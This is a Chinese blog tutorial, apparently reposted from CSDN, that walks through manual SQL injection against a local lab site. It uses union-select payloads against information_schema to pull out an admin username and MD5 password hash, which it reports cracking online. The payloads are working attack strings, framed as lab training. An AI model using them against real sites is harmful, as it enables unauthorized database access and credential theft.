SQL注入基础步骤及SQLMap工具使用(一)

SQL注入基础步骤及SQLMap工具使用(一)

测试环境为VMware WorkStation虚拟机

一、环境搭建

(一)、phpstudy2018集成环境安装使用

安装使用,自行百度,下载地址:官网地址

1. http://phpstudy.php.cn/

(二)、SQL注入源码

百度网盘:

1. 链接:https://pan.baidu.com/s/1B0VSwXk6JnZbBpRgr5S3iQ 密码:wgze

(三)、图示

 

目标网站:

1. http://localhost/sqls/index.php?id=1

二、SQL注入过程详解

(一)、注入点查找

1、'单引号测试

1. http://localhost/sqls/index.php?id=1'

图示:

2、and 1=1 和 and 1=2测试

1. http://localhost/sqls/index.php?id=1 and 1=1

2. http://localhost/sqls/index.php?id=1 and 1=2

图示:1

 

图示:2

测试结果:该URL可注入

(二)、详细注入过程

1、order by 猜字段数

1. http://localhost/sqls/index.php?id=1 oder by 3

图示:

 

 

http://localhost/sqls/index.php?id=1 oder by 4

图示:

 

得出字段数为3

2、union联合查询

(1)、查看当前运行环境

常用函数,其他请自行查询

1)、数据库名称:

1. database()

2)、当前用户:

1. user()

3)、php版本:

1. version()

4)、操作系统:

1. @@version_compile_os

图示:1

 

 

图示:2

 

(2)、猜解表名:

1. http://localhost/sqls/index.php?id=1 union select 1,2,table_name from information_schema.tables where table_schema = 0x74657374   (test的16进制)

 

图示:

 

猜解结果:admin表为我们要找的存储管理员账号、密码的表

(3)、猜解列名

1. http://localhost/sqls/index.php?id=1 union select 1,2,column_name from information_schema.columns where table_name = 0x61646d696e

图示:

 

猜解结果:user、pwd为我们要找的管理员账号、密码

(4)、猜解最终账号、密码

1)、猜解账号

1. http://localhost/sqls/index.php?id=1 union select user,2,3 from admin

图示:

 

猜解结果:管理员账户-admin

2)、猜解密码

1. http://localhost/sqls/index.php?id=1 union select pwd,2,3 from admin

图示:

 

猜解结果:管理员密码-3f230640b78d7e71ac5514e57935eb69(32位md5加密)

3)、md5在线解密

网站:

1. http://www.cmd5.com/

结果:密码-qazxsw

三、登录后台

图示:

有任何问题和需要可联系本人:

QQ:806797785

邮箱:[email protected]

发布了17 篇原创文章 · 获赞 3 · 访问量 2697

猜你喜欢

转载自blog.csdn.net/gaogzhen/article/details/80840271